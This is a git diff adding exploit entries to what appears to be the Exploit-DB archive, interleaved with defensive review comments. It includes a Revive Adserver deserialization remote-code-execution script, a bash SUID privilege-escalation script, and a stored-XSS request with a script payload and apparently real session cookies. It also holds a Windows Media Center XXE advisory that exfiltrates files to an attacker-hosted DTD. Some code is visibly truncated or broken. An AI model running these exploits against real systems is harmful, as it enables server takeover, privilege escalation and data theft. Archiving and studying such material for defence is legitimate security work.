diff --git a/exploits/hardware/webapps/47738.txt b/exploits/hardware/webapps/47738.txt
new file mode 100644
index 000000000..b6bca6acb
--- /dev/null
+++ b/exploits/hardware/webapps/47738.txt
@@ -0,0 +1,19 @@
+# Exploit Title: Intelbras Router RF1200 1.1.3 - Cross-Site Request Forgery
+# Date: 2019-11-06
+# Exploit Author: Joas Antonio
+# Vendor Homepage: intelbras.com.br
+# Software Link: https://www.intelbras.com/pt-br/roteador-wireless-smart-dual-band-action-rf-1200
+# Version: 1.1.3 (REQUIRED)
+# Tested on: Windows
+# CVE : CVE-2019-19516
+
+#POC1:
+
+
+
+
+
\ No newline at end of file
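Review bot: The `#POC1:` section is empty: the file ends after a run of blank lines, so the entry names a CSRF issue without saying which page, request or setting change is affected. Without that, a reader cannot check whether a given firmware build is exposed or confirm a fix. I would add at least one descriptive line, for example `# Description: <affected admin action> is accepted without an anti-CSRF token or Origin/Referer check`, with the placeholder filled in by the author. The `# Version: 1.1.3 (REQUIRED)` line also looks like leftover submission-template text and should probably read `# Version: 1.1.3`.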
diff --git a/exploits/linux/local/47726.sh b/exploits/linux/local/47726.sh
index d2a88dedc..23d92a16d 100755
--- a/exploits/linux/local/47726.sh
+++ b/exploits/linux/local/47726.sh
@@ -20,22 +20,17 @@ runtime loading of a new builtin, which can be a shared object that calls setuid
regains privileges. However, binaries running with an effective UID of 0 are unaffected.
#!/bin/bash
-
-
#Terminal Color Codes
RED='\033[0;31m'
GREEN='\033[0;32m'
NC='\033[0m'
-
#Get the Effective User ID (owner of the SUID /bin/bash binary)
read -p "Please enter effective user id (euid) : " euid
-
#Create a C file and output the exploit code
touch pwn.c
echo "" > pwn.c
-
cat <> pwn.c
#include
@@ -50,7 +45,6 @@ void __attribute((constructor)) initLibrary(void) {
}
EOT
-
echo -e "${RED}"
echo -e "Exploit Code copied to pwn.c !\n"
sleep 5
@@ -64,7 +58,5 @@ echo -e "Exploit Compiled ! \n"
sleep 5
echo -e "Executing Exploit :) \n"
sleep 5
-
-
#Execute the Shared Library
echo -e "${RED}Run : ${NC} enable -f ./libpwn.so asd \n"
\ No newline at end of file
diff --git a/exploits/php/webapps/47730.txt b/exploits/php/webapps/47730.txt
index bcd16c8d8..d15cf08e8 100644
--- a/exploits/php/webapps/47730.txt
+++ b/exploits/php/webapps/47730.txt
@@ -1,7 +1,7 @@
# Exploit Title: SmartHouse Webapp 6.5.33 - Cross-Site Request Forgery
# Discovery by: LiquidWorm
# Date: 2019-12-02
-# Vendor Homepage: http://www.gavazzi-automation.com
+# Vendor Homepage:
# Tested Version: 6.5.33.17072501
# CVE: N/A
# Advisory ID: ZSL-2019-5543
diff --git a/exploits/php/webapps/47737.txt b/exploits/php/webapps/47737.txt
new file mode 100644
index 000000000..8aefee2a3
--- /dev/null
+++ b/exploits/php/webapps/47737.txt
@@ -0,0 +1,30 @@
+# Exploit Title: Online Invoicing System 2.6 - 'description' Persistent Cross-Site Scripting
+# Date: 2019-11-29
+# Exploit Author: Cemal Cihad ÇİFTÇİ
+# Vendor Homepage: https://bigprof.com
+# Software Download Link : https://github.com/bigprof-software/online-invoicing-system
+# Software : Online Invoicing System
+# Version : 2.6
+# Vulernability Type : Cross-site Scripting
+# Vulenrability : Stored XSS
+
+# Stored XSS has been discovered in the Online Invoicing System created by bigprof/AppGini
+# editmembers section. Description parameter affected from this vulnerability.
+# payload:
+
+# HTTP POST request
+POST /inovicing/app/admin/pageEditGroup.php HTTP/1.1
+Host: 10.10.10.160
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 464
+Origin: http://10.10.10.160
+Connection: close
+Referer: http://10.10.10.160/inovicing/app/admin/pageEditGroup.php?groupID=2
+Cookie: inventory=4eg101l42apiuvutr7vguma5ar; online_inovicing_system=vl8ml5or8sgdee9ep9lnhglk69
+Upgrade-Insecure-Requests: 1
+
+groupID=2&name=Admins&description=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E&visitorSignup=0&invoices_insert=1&invoices_view=3&invoices_edit=3&invoices_delete=3&clients_insert=1&clients_view=3&clients_edit=3&clients_delete=3&item_prices_insert=1&item_prices_view=3&item_prices_edit=3&item_prices_delete=3&invoice_items_insert=1&invoice_items_view=3&invoice_items_edit=3&invoice_items_delete=3&items_insert=1&items_view=3&items_edit=3&items_delete=3&saveChanges=1
\ No newline at end of file
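Review bot: The captured request's `Cookie:` line carries what look like real session identifiers from the tester's environment; these should be replaced with placeholders before publishing, e.g. `Cookie: online_inovicing_system=<session-id>`. The `# payload:` label is followed by nothing, and the two header labels are misspelled (`Vulernability`, `Vulenrability`), which hurts searchability. For defenders the entry would be more useful if it stated where the stored `description` value is later rendered, since the fix belongs at that output point: encode on display, for instance with `htmlspecialchars($description, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8')`. The request body shows no anti-CSRF field either, which may be worth a separate line if confirmed.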
diff --git a/exploits/php/webapps/47739.php b/exploits/php/webapps/47739.php
new file mode 100644
index 000000000..eb875ddde
--- /dev/null
+++ b/exploits/php/webapps/47739.php
@@ -0,0 +1,155 @@
+# Exploit Title: Revive Adserver 4.2 - Remote Code Execution
+# Google Dork: "inurl:www/delivery filetype:php"
+# Exploit Author: crlf
+# Vendor Homepage: https://www.revive-adserver.com/
+# Software Link: https://www.revive-adserver.com/download/archive/
+# Version: 4.1.x <= 4.2 RC1
+# Tested on: *nix
+# CVE : CVE-2019-5434
+# Сontains syntax error for protection against skids
+
+
+\'')) : @list($x, $url, $code) = $argv);
+
+ $source = 'data:text/html;base64,'.base64_encode('#');
+ $destination = 'plugins/.htaccess';
+ #$destination = 'var/.htaccess';
+
+ if(!strpos(request($url, $source, $destination), 'methodResponse')) exit(message('failed, no valid response from '.$url));
+
+ $source = 'data:text/html;base64,'.base64_encode($code);
+ $destination = 'plugins/3rdPartyServers/ox3rdPartyServers/doubleclick.class.php';
+ #$destination = 'var/default.conf.php';
+
+ request($url, $source, $destination);
+ message('check '.$url.$destination);
+
+ function request($url, $source, $destination){
+
+ $what = serialize(
+ ['what' =>
+ new Pdp\Uri\Url(
+ new League\Flysystem\File( $destination,
+ new League\Flysystem\File( 'x://'.$source,
+ new League\Flysystem\MountManager(
+ new League\Flysystem\Filesystem(
+ new League\Flysystem\Config,
+ new League\Flysystem\Adapter\Local('')
+ ),
+ new League\Flysystem\Plugin\ForcedCopy
+ )
+ )
+ )
+ )
+ ]
+ );
+
+ $what = str_replace(['\Uri\Url\00'],['\5CUri\5CUrl\00'], str_replace(['s:', сhr(0)],['S:', '\\00'], $what));
+
+ $xml = '
+
+ openads.spc
+
+
+
+
+
+ remote_addr
+ 8.8.8.8
+
+
+ cookies
+
+
+
+
+
+
+
+
+ '.$what.'
+ 0
+ dsad
+ 1
+ 0
+ 1
+
+ ';
+
+ return file_get_contents($url.'adxmlrpc.php', false, stream_context_create(
+ ['http' =>
+ ['method' => 'POST',
+ 'user_agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0',
+ 'header' =>'Content-type: application/x-www-form-urlencoded',
+ 'content'=> $xml
+ ]
+ ])
+ );
+ }
+
+ function message($str){
+ print PHP_EOL.'### '.$str.' ###'.PHP_EOL.PHP_EOL;
+ }
+}
+
+namespace League\Flysystem\Plugin{
+ class ForcedCopy{}
+}
+
+namespace League\Flysystem{
+ class Config{
+ protected $settings = [];
+ public function __construct(){
+ $this->settings = ['disable_asserts' => true];
+ }
+ }
+ class Filesystem{
+ protected $adapter;
+ protected $config;
+ public function __construct($config,$adapter){
+ $this->config = $config;
+ $this->adapter = $adapter;
+ }
+ }
+ class MountManager{
+ protected $filesystems = [];
+ protected $plugins = [];
+ public function __construct($filesystem, $handler){
+ $this->filesystems = ['x' => $filesystem];
+ $this->plugins = ['__toString' => $handler];
+ }
+ }
+ class File{
+ protected $path;
+ protected $filesystem;
+ public function __construct($path, $obj){
+ $this->filesystem = $obj;
+ $this->path = $path;
+ }
+ }
+}
+
+namespace League\Flysystem\Adapter{
+ class Local{
+ protected $pathPrefix;
+ public function __construct($prefix){
+ $this->pathPrefix = $prefix;
+ }
+ }
+}
+
+namespace Pdp\Uri{
+ class Url{
+ private $host;
+ public function __construct($file){
+ $this->host = $file;
+ }
+ }
+}
\ No newline at end of file
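Review bot: The header comment block (the `# Exploit Title` through `# CVE` lines) gives no remediation or detection guidance, which is what an operator of an affected Revive Adserver install needs most. From what the visible code does, two indicators could be documented: POST requests to `adxmlrpc.php` whose body carries a PHP-serialized object (class names such as `League\Flysystem\MountManager`), and unexpected changes to `plugins/.htaccess` or `plugins/3rdPartyServers/ox3rdPartyServers/doubleclick.class.php`. I would add a comment such as `# Mitigation: upgrade beyond the affected range above; restrict or disable adxmlrpc.php if XML-RPC delivery is unused`. The underlying flaw appears to be deserialization of request-supplied data, so the durable application-side fix is to stop passing untrusted input to `unserialize()`.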
diff --git a/exploits/xml/local/47740.txt b/exploits/xml/local/47740.txt
new file mode 100644
index 000000000..2aeeeba69
--- /dev/null
+++ b/exploits/xml/local/47740.txt
@@ -0,0 +1,113 @@
+# Exploit Title: Microsoft Windows Media Center 2002 - XML External Entity MotW Bypass
+# Discovery by: hyp3rlinx
+# Date: 2019-12-03
+# Vendor Homepage: www.microsoft.com
+# CVE: N/A
+
+[+] Credits: John Page (aka hyp3rlinx)
+[+] Website: hyp3rlinx.altervista.org
+[+] Source: http://hyp3rlinx.altervista.org/advisories/WINDOWS-MEDIA-CENTER-MOTW-BYPASS-XXE-ANNIVERSARY-EDITION.txt
+[+] ISR: Apparition Security
+
+
+[Vendor]
+www.microsoft.com
+
+
+[Product]
+Microsoft Windows Media Center
+
+Windows Media Center is a discontinued digital video recorder and media player created by Microsoft.
+Media Center was first introduced to Windows in 2002 on Windows XP Media Center.
+
+
+[Vulnerability Type]
+XML External Entity MotW Bypass (Anniversary Edition)
+
+
+[CVE Reference]
+N/A
+
+
+[Security Issue]
+This vulnerability was originally released by me back on December 4, 2016, yet remains unfixed.
+Now, to make matters worse I will let you know "mark-of-the-web" MotW does not matter here, its just ignored.
+Meaning, if the .MCL file is internet downloaded it gets the MOTW but files still exfiltrated.
+
+Therefore, I am releasing this "anniversary edition" XXE with important motw informations.
+
+This is a fully working remote information disclosure vulnerability that still affects Windows 7.
+Windows 7 is near end of life this January, yet it is still used by many organizations.
+Furthermore, it seems that Windows 8.1 (Pro) can also run Windows Media Center but I have not tested it.
+
+Host the "FindMeThatBiotch.dtd" DTD file in the web-root of the attacker server Port 80 etc...
+Download the ".mcl" file using Microsoft Internet Explorer.
+
+Check the MotW where you downloaded the .mcl file dir /r and note the Zone.Identifier:$DATA exists.
+Open the file and BOOM! watch shitz leaving!... still vulnerable after all these years lol.
+
+OS: Windows 7 (tested successfully) and possibly Windows 8.1 Pro
+
+
+[Exploit/POC]
+1) "M$-Wmc-Anniversary-Motw-Bypass.mcl"
+
+# PoC
+
+
+/FindMeThatBiotch.dtd">
+%junk;
+%param666;
+%FindMeThatBiotch;
+]>
+
+
+2) "FindMeThatBiotch.dtd"
+/%data666;'>">
+
+
+3) Auto exploit PHP .mcl file downloader.
+
+/M$-Wmc-Anniversary-Motw-Bypass.mcl';
+header('Content-Type: application/octet-stream');
+header("Content-Transfer-Encoding: Binary");
+header("Content-disposition: attachment; filename=\"" . basename($url) . "\"");
+readfile($url);
+?>
+
+
+4) python -m SimpleHTTPServer 80
+
+
+
+[POC Video URL]
+https://www.youtube.com/watch?v=zcrATpBNAZ0
+
+
+[Network Access]
+Remote
+
+
+
+[Severity]
+High
+
+
+[Disclosure Timeline]
+Vendor Notification: December 4, 2016
+MSRC "wont fix"
+Dec 2, 2019 : Re-Public "unfixed anniversary" Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx
\ No newline at end of file
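Review bot: The advisory has no mitigation section, even though `[Disclosure Timeline]` records the vendor response as "wont fix" and `[Security Issue]` says Windows 7 is still affected. I would add a short `[Mitigation]` block covering, for example, removing the `.mcl` file association on hosts that still have Windows Media Center, blocking `.mcl` files at the mail and web gateway, and restricting outbound HTTP from workstations to unknown hosts. The title's "Windows Media Center 2002" also sits oddly with the body, which reports testing on Windows 7 only; the `[Product]` section could state which builds were actually verified.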
diff --git a/files_exploits.csv b/files_exploits.csv
index f0d1b99a4..29a3b9ff1 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -10823,6 +10823,7 @@ id,file,description,date,author,type,platform,port
47733,exploits/windows/local/47733.txt,"Max Secure Anti Virus Plus 19.0.4.020 - Insecure File Permissions",2019-12-02,hyp3rlinx,local,windows,
47734,exploits/windows/local/47734.py,"Anviz CrossChex 4.3.12 - Local Buffer Overflow",2019-12-02,"Luis Catarino",local,windows,
47735,exploits/xml/local/47735.txt,"Microsoft Excel 2016 1901 - XML External Entity Injection",2019-12-02,hyp3rlinx,local,xml,
+47740,exploits/xml/local/47740.txt,"Microsoft Windows Media Center 2002 - XML External Entity MotW Bypass",2019-12-03,hyp3rlinx,local,xml,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -42047,3 +42048,6 @@ id,file,description,date,author,type,platform,port
47725,exploits/php/webapps/47725.txt,"Online Inventory Manager 3.2 - Persistent Cross-Site Scripting",2019-11-29,"Cemal Cihad ÇİFTÇİ",webapps,php,
47730,exploits/php/webapps/47730.txt,"SmartHouse Webapp 6.5.33 - Cross-Site Request Forgery",2019-12-02,LiquidWorm,webapps,php,
47731,exploits/php/webapps/47731.txt,"Dokuwiki 2018-04-22b - Username Enumeration",2019-12-02,"Talha ŞEN",webapps,php,
+47737,exploits/php/webapps/47737.txt,"Online Invoicing System 2.6 - 'description' Persistent Cross-Site Scripting",2019-12-03,"Cemal Cihad ÇİFTÇİ",webapps,php,
+47738,exploits/hardware/webapps/47738.txt,"Intelbras Router RF1200 1.1.3 - Cross-Site Request Forgery",2019-12-03,"Prof. Joas Antonio",webapps,hardware,80
+47739,exploits/php/webapps/47739.php,"Revive Adserver 4.2 - Remote Code Execution",2019-12-03,crlf,webapps,php,
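Review bot: The new row for 47738 gives the author as `"Prof. Joas Antonio"`, while the `# Exploit Author:` line in `exploits/hardware/webapps/47738.txt` reads `Joas Antonio`; one of the two should be changed so that author searches match both records. The same row sets the port column to `80`, which the entry file does not state anywhere, so that value is worth confirming with the submitter.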